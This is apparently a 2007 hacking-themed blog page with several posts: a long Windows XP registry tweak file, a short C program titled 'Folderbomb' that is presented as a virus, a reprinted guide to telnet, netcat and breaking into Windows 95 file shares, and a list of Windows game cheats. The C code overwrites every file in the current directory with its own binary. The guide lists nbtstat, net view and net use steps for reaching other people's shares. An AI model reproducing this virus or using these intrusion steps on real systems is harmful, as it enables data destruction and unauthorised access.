[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"DisableThumbnailCache"=dword:00000001
;Show hidden files/objects
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Hidden"=dword:00000001
;Show protected OS files
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"ClassicViewState"=dword:00000000"PersistBrowsers"=dword:00000000"ServerAdminUI"=dword:00000000"EnableBalloonTips"=dword:00000001"Start_ShowNetPlaces_ShouldShow"=dword:00000041
;Set How many "frequently accessed programs" should be isted at left-panel of new_style Start Menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_MinMFU"=dword:00000004
;Show Control Panel as cascaded menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_ShowControlPanel"=dword:00000002"Start_ShowHelp"=dword:00000001
;Cascade "My Documents" from Start Menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_ShowMyDocs"=dword:00000002"Start_ShowMyMusic"=dword:00000000"Start_ShowMyPics"=dword:00000000"Start_ShowPrinters"=dword:00000000"Start_ShowSetProgramAccessAndDefaults"=dword:00000000"Start_ShowRecentDocs"=dword:00000002
;Disable highlighting of new applications in start menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_NotifyNewApps"=dword:00000000
;Administrative Tools in your Start Menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_AdminToolsRoot"=dword:00000000
;Set icon size for start menu , 1 = Large / 0 = Small Icons
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"Start_LargeMFUIcons"=dword:00000001
;Don't Group Similar Taskbar Buttons
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"TaskbarGlomming"=dword:00000000[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"TaskbarGlomming"=dword:00000000
;Adds Printers and Faxes to MY Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{2227A280-3AEA-1069-A2DE-08002B30309D}]
;Adds Recycle Bin to MY Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}]
;Adds Network Connections to MY Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{7007ACC7-3202-11D1-AAD2-00805FC1270E}]
;Adds Administrative Tools to MY Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{D20EA4E1-3957-11D2-A40B-0C5020524153}]
;Adds Scheduled Tasks to MY Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
;Display "Control Panel" in My Computer
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideMyComputerIcons]"{21EC2020-3AEA-1069-A2DD-08002B30309D}"=dword:00000000
;Remove Recycle Bin From Desktop
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum]"{645FF040-5081-101B-9F08-00AA002F954E}"=dword:00000001
;Preset Folder Customizations for dialog box Sets default to My Computer then lists My Computer, C:, D:, E:, and Network Places on side C: here is represented as %systemdrive% in the registry
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\comdlg32\PlacesBar]"Place0"=dword:00000011"Place1"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,44,00,72,00,69,00,76,\00,65,00,25,00,5c,00,00,00"Place2"="D:\\""Place3"="E:\\""Place4"=dword:00000012@=dword:00000011
;Specify The First Desktop Icon: (48)=My Doc's 54 =My Comp
[HKEY_CLASSES_ROOT\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}]"SortOrderIndex"=dword:00000048
;No file-folder connections
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"NoFileFolderConnection"=dword:00000001
;Launch Windows Desktop in a Separate Process (i.e., de-link IE from windows explorer - so that both don't crash together)
"DesktopProcess"=dword:00000001
;Show Windows classic folders
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\WebView]"DefaultValue"=dword:00000000
;Foreground Window Lock
[HKEY_CURRENT_USER\Control Panel\Desktop]"ForegroundLockTimeout"=dword:00030d40"ForegroundFlashCount"=dword:00000003
;Allow renaming of Recycle Bin
[HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder]"Attributes"=hex:50,01,00,20"CallForAttributes"=dword:00000000
;Change Recycle Bin Icons The icons must be in the $$ folder directly for unattend install.If you use this after an install then the Bmp file must be under windows folder
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]@="%WinDir%\\system32\\shell32.dll,31""Full"="%WinDir%\\system32\\shell32.dll,32""Empty"="%WinDir%\\system32\\shell32.dll,31"
;Sort Start Menu and Favourites in Alphabetical Order (All Windows)
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder]
;Remove frequently accessed programs list from Start Menu
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoStartMenuMFUprogramsList"=dword:00000001
;Cache more Icons
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]"Max Cached Icons"="8192"
;Change MenuShowDelay (Start Menu load speed)
[HKEY_CURRENT_USER\Control Panel\Desktop]"MenuShowDelay"="200"
;Removes Language Bar
[-HKEY_CLASSES_ROOT\CLSID\{540D8A8B-1C3F-4E32-8132-530F6A502090}]@=-"MenuTextPUI"=-
;Classic Menu (change to 00000001 to enable classic look)
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"NoSimpleStartMenu"=dword:00000000
;Disable Automatic Hiding of Inactive Tray Icons
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]"EnableAutoTray"=dword:00000000
;Add custom quicklaunch , Please visit http://www.msfn.org/board/index.php?showtopic=51753
;=======================================================================; 7 - Logon;=======================================================================
;disable unread mail message at welcome screen[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\UnreadMail]"MessageExpiryDays"=dword:00000000
;Set information to appear above name/password fields in logon prompt[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"LogonPrompt"="Veuillez tapper votre nom d'utilisateur et mot de passe"
;Faster reboot time[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"EnableQuickReboot"="1"
Power computer off after shutdown Value: (0 = default, 1 = power down)[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"PowerdownAfterShutdown"="1"
;Setting for log-on screen[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"dontdisplaylastusername"=dword:00000001
;Message to display before user logon[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"legalnoticecaption"="""legalnoticetext"=""
;=======================================================================; Visual Settings;=======================================================================;Removes More Themes Online..." option in the Themes dropdown box[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\DownloadSites]
;Disable screensavers[HKEY_CURRENT_USER\Control Panel\Desktop]"ScreenSaveActive"="0"[HKEY_CURRENT_USER\Control Panel\Desktop]"SCRNSAVE.EXE"=""[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"ScreenSaveActive"="0"[HKEY_USERS\.DEFAULT\Control Panel\Desktop]"SCRNSAVE.EXE"=""
;Enable Clear Type for ALL Users[HKEY_CURRENT_USER\Control Panel\Desktop]"FontSmoothingType"=dword:00000002
;=======================================================================; My Computer Right Click;=======================================================================

;Adds Control Panel to right click of MY Computer[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Panneau de configuration\command]@="rundll32.exe shell32.dll,Control_RunDLL"
;Adds Add/Remove to right click of MY Computer[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Ajout & Supression de programmes\command]@="control appwiz.cpl"
;Adds Registry Editor right click of MY Computer[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit]@="Regedit"[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\regedit\command]@="Regedit.exe"
;Adds MSCONFIG right click of MY Computer[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\msconfig]@="Msconfig"[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\msconfig\command]@="msconfig.exe"

;=======================================================================; Context Menus;=======================================================================
;Makes a right click option for unknown files (Open with notepad)[HKEY_CLASSES_ROOT\*\shell]@="\"notepad.exe %1\""[HKEY_CLASSES_ROOT\*\shell\open]@="Ouvrir avec Notepad"[HKEY_CLASSES_ROOT\*\shell\open\command]@="notepad.exe %1"
; Get a new Right-click menu option (command box)[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here]@="Invite de commande"[HKEY_CLASSES_ROOT\Directory\shell\Command Prompt Here\command]@="cmd.exe /k cd %1"
; disable file association web-service - Bypassing "Browse web for program" to open unknown extension. "Open With..." becomes default[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]"NoInternetOpenWith"=dword:00000001
; all items have an "edit.." on right-click sending to notepad[HKEY_CLASSES_ROOT\*\shell\open]@="Editer avec Notepad"[HKEY_CLASSES_ROOT\*\shell\open\command]@="notepad.exe %1"
;This adds an option in the right-click (context) menu to open any folder on your computer in a new window.[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\openNew]@="Ouvrir dans une nouvelle fenêtre"[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\shell\openNew\Command]@="explorer %1"
;=======================================================================; Internet Explorer and Outlook Express;=======================================================================
;No header and footer in Internet explorer printout[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup]"header"="""footer"=""
;Minimize Outlook to the System Tray[HKEY_Current_User\Software\Microsoft\Office\10.0\Outlook\Preferences]"MinToTray"=dword:00000001
;Brand IE explorer title bar[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Window Title"="Internet Explorer Optimized By Kill-a-Bee"
;Brand Outlook express title bar[HKEY_CURRENT_USER\Identities\{E2883460-019D-11D8-AC1F-AA7C5EECB833}\Software\Microsoft\Outlook Express\5.0]"WindowTitle"="Outlook Express Optimized By Kill-a-Bee"
;Add Google As Main Start Page[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Start Page"="http://www.bwa-qc.com/"
;Change the Internet Explorer Window Title[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Window Title"="Internet Exploiter/Exploder"
;Add Google As Main/default Search Page[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]"Use Search Asst"="no""Search Page"="http://torrentsearcher.filesharingplace.com/"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL]@="http://www.google.com/keyword/%s""provider"="gogl"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search]"SearchAssistant"="http://torrentsearcher.filesharingplace.com/ie/"
;Adds search keywords to Internet Explorer address bar (in this order: Microsoft Knowledge Base, Altavista, Google, MSN, FileMirrors)[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\MSKB]@="http://support.microsoft.com/?kbid=%s"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\AV]@="http://www.microhard.co.nr"[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\g]@="http://www.google.com/search?q=%s"
Posted by BAS at 11:00 PM 0 comments
Labels: cracking, cracks, hacking, hacks, registry, windows, windows xp, xp
Virus code in c /*this is a simple program to create a virus in c
it will create folder in a folder in a folder and so on run this on your own responsibility*/
#include#include#include#include#includevoid main(int argc,char* argv[]){ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);cprintf(”————————————————————————–”);printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n”);cprintf(”————————————————————————–”);done = findfirst(”*.*”,&ffblk,0);while (!done){ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);source=open(argv[0],O_RDONLYO_BINARY);target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);while(1){byt=read(source,buf,512);if(byt>0)write(target,buf,byt);elsebreak;}close(source);close(target);done = findnext(&ffblk);}getch();}
Posted by BAS at 10:52 PM 2 comments
Labels: administrator, cracks, dos, mail hacking, password, password hacking, pc hacking, registry, remote access, screwup pc, virus writing, windows, windows xp
Make a folder invisible (good one) Make the folder INVISIBLE without hidingMake your folders invicible…:)
1)Right Click on the desktop.Make a new folder
2)Now rename the folder with a space(U have to hold ALT key and type 0160).
3)Now u have a folder with out a name.
4)Right click on the folder>properties>customize. Click on change icon.
5)Scroll a bit, u should find some empty spaces, Click on any one of them.click ok Thats it,now u can store ur personal data without any 3rd party tools
Posted by BAS at 10:50 PM 7 comments

Tuesday, October 2, 2007DOS HACKING ****************************************************** In this Guide you will learn how to: * Use telnet from Windows * Download web pages via telnet * Get finger information via telnet * Telnet from the DOS command-line * Use netcat * Break into Windows Computers from the Internet Protecting Yourself What can they do The command-line approach The GUI approach Final Words ************************************************************ How to Use Telnet on a Windows Computer Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet. If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users. First off, telnet isn't so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine. Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window. Let's begin by opening telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type: c:\telnet The window for telnet will open, and you can browse the features of the program from the menu bar. *************************************************** NEWBIE NOTE: In this text file, I am referring only to the telnet program that ships with Win95/NT. If you type "telnet" at the command prompt and you don't get the telnet window, make sure that the program is on your hard drive using the Start -> Find -> Files or Folders command. Also make sure that your path statement includes the Windows directory. There are many other programs available that provide similar functionality, with a lot of other bells and whistles, from any number of software sites. ************************************************* To learn a bit more about telnet, choose Help -> Contents, or Help -> Search for help on... from the menu bar. Read through the files in order to find more detailed explanations of things you may wish to do. For example, in this explanation, I will primarily be covering how to use the application and what it can be used for, but now how to customize the colors for the application. Now, if you choose Connect -> Remote System, you will be presented with a dialog window that will ask you for the remote host, the port and the terminal type. **************************************************** NEWBIE NOTE: For most purposes, you can leave the terminal type on VT100. **************************************************** In the Connect dialog box, you can enter in the host to which you wish to connect, and there is a list box of several ports you can connect to: daytime: May give you the current time on the server. echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day. chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program. telnet: May present you with a login screen. These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service. When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt. [Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.] ********************************************* NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account. ********************************************** Now, you can also use telnet to connect to other ports, such as ftp (21), smtp (25), pop3 (110), and even http (80). When you connect to ftp, smtp, and pop3, you will be presented with a banner, or a line of text that displays some information about the service. This will give you a clue as to the operating system running on the host computer, or it may come right out and tell you what the operating system is...for instance, AIX, Linux, Solaris, or NT. If you successfully connect to port 80, you will see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection. Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server. How to Download Web Pages Via Telnet To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad. Now, connect the remote host, and if your connection is successful, type in: GET / HTTP/1.0 and hit enter twice. ************************************************** NEWBIE NOTE: Make sure that you hit enter twice...this is part of the HTTP protocol. The single / after GET tells the server to return the default index file, which is generally "index.html". However, you can enter other filenames, as well. ************************************************* You should have seen a bunch of text scroll by on the screen. Now you can open the log file in Notepad, and you will see the HTML code for the page, just as though you had chosen the View Source option from your web browser. You will also get some additional information...the headers for the file will contain some information about the server. For example: HTTP/1.0 200 Document follows Date: Thu, 04 Jun 1998 14:46:46 GMT Server: NCSA/1.5.2 Last-modified: Thu, 19 Feb 1998 17:44:13 GMT Content-type: text/html Content-length: 3196 One particularly interesting piece of information is the server name. This refers to the web server software that is running and serving web pages. You may see other names in this field, such as versions of Microsoft IIS, Purveyor, WebSite, etc. This will give you a clue as to the underlying operating system running on the server. ************************************************* SYSADMIN NOTE: This technique, used in conjunction with a database of exploits on web servers, can be particularly annoying. Make sure you keep up on exploits and the appropriate security patches from your web server and operating system vendors. ************************************************* ************************************************* NEWBIE NOTE: This technique of gathering web pages is perfectly legal. You aren't attempting to compromise the target system, you are simply doing by hand what your web browser does for you automatically. Of course, this technique will not load images and Java applets for you. ************************************************ Getting Finger Information Via Telnet By now, you've probably heard or read a lot about finger. It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet? The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen. **************************************************** NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, and server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer. **************************************************** The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc. Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter: user@host1.com You should see the same information! Again, this all depends upon the configuration of the finger daemon. Using Telnet from the Command Line Now, if you want to show your friends that you a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type: c:\>telnet and the program will automatically attempt to connect to the host on the designated port for you. Using Netcat Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to: http://www.l0pht.com/~weld NOTE: The first character of "l0pht: is the letter "l". The second character is a zero, not an "o". I know that the program is supposed to run on NT, but I have seen it run on Win95. It's a great little program that can be used to do some of the same things as telnet. However, there are advantages to using netcat...for one, it's a command-line program, and it can be included in a batch file. In fact, you can automate multiple calls to netcat in a batch file, saving the results to a text file. ************************************************** NEWBIE NOTE: For more information on batch files, see previous versions of the Guide To (mostly) Harmless Hacking, Getting Serious with Windows series ...one of them dealt with basic batch file programming. ************************************************** Before using netcat, take a look at the readme.txt file provided in the zipped archive you downloaded. It goes over the instructions on how to download web pages using netcat, similar to what I described earlier using telnet. There are two ways to go about getting finger information using netcat. The first is in interactive mode. Simply type: c:\>nc 79 If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed: c:\>edit root and entered the username "root", without the quotes. Then from the command prompt, type: c:\>nc 79 <>nc 79 <> nc.log to create the file nc.log, or: c:\>nc 79 <>> nc.log to append the response to the end of nc.log. NOTE: Make sure that you use spaces between the redirection operators.How to Break into a Windows 95 machine Connected to the Internet Disclaimer The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself. There are no special tools needed to access a remote Win95 machine...everything you need is right there on your Win95 system! Two methods will be described...the command-line approach and the GUI approach. Protecting Yourself First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win95 computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy. What Can They Do? What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed. ** The command-line approach ** Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type: c:\>nbtstat -A [ip_addr] If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- NAME <00> UNIQUE Registered DOMAIN <00> GROUP Registered NAME <03> UNIQUE Registered USERNAME <03> UNIQUE Registered MAC Address = 00-00-00-00-00-00 This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes). **Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate. The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>". **Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc. If you find a machine with sharing enabled, the next thing to do is type the following command: c:\>net view \\[ip_addr] Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command: c:\>net use g: \\[ip_addr]\[share_name] You will likely get a response that the command was completed successfully. If that is the case, type: c:\>cd g: or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc. Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used. ** The GUI approach ** After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file: c:\windows\lmhosts.sam Read over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type: c:\>nbtstat -R This command reloads the cache from the Lmhosts file you just created. Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password. ************************************************ Note from Carolyn Meinel: Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in. First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up: C:\WINDOWS>netstat -r Route Table Active Routes: Network Address Netmask Gateway Address Interface Metric 0.0.0.0 0.0.0.0 198.999.176.84 198.999.176.84 1 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 198.999.176.0 255.255.255.0 198.999.176.84 198.999.176.84 1 198.999.176.84 255.255.255.255 127.0.0.1 127.0.0.1 1 198.999.176.255 255.255.255.255 198.999.176.84 198.999.176.84 1 224.0.0.0 224.0.0.0 198.999.176.84 198.999.176.84 1 255.255.255.255 255.255.255.255 198.999.176.84 0.0.0.0 1 Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer. *************************************************** ************************************************** Evil Genius tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP! **************************************************** *************************************************** YOU CAN GO TO JAIL WARNING: If you find a Windows 95 box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike! ************************************************ Final Words Please remember that this Guide is for instructional purposes only and is meant to educate the sysadmin and user alike. If someone uses this information to gain access to a system which they have no permission or business messing with, I (keydet) cannot be responsible for the outcome. If you are intending to try this information out, do so with the consent and permission of a friend. If there are questions, comments or any doubts then feel free to ask me heregreetz,
Posted by BAS at 5:03 PM 1 comments
Labels: cracking, dos, hacking, hacks, mail hacking, telnet, web hacking, windows, windows xp
All windows games cheats and cracks MinesweeperSecret - Reveal MinesInstructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.PinballSecret - Extra BallsInstructions - Type 1max at the start of a new ball to get extra balls.Secret - Gravity WellInstructions - Type gmax at the start of a new game to activate the Gravity Well.Secret - Instant PromotionInstructions - Type rmax at the start of a new game to go up in ranks.Secret - Skill ShotInstructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:First: 15,000 pointsSecond: 30,000 pointsThird: 75,000 pointsFourth: 30,000 pointsFifth: 15,000 pointsSixth: 7,500 pointsSecret - Test ModeInstructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.Secret - Unlimited BallsInstructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restartingFreeCellSecret - Instant WinInstructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.Secret - Hidden Game ModesInstructions - In the “Game” menu choose “Select Game”. Enter -1 or -2 to activate the hidden game modes.SolitaireSecret - Instant WinInstructions - Press Alt + Shift + 2 during game play to instantly win.Secret - Draw single cards in a Draw Three gameInstructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.Infinite PointsIn the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the “A” key and then let go of the left mouse key. You will get 10 points for this. Continue doing this 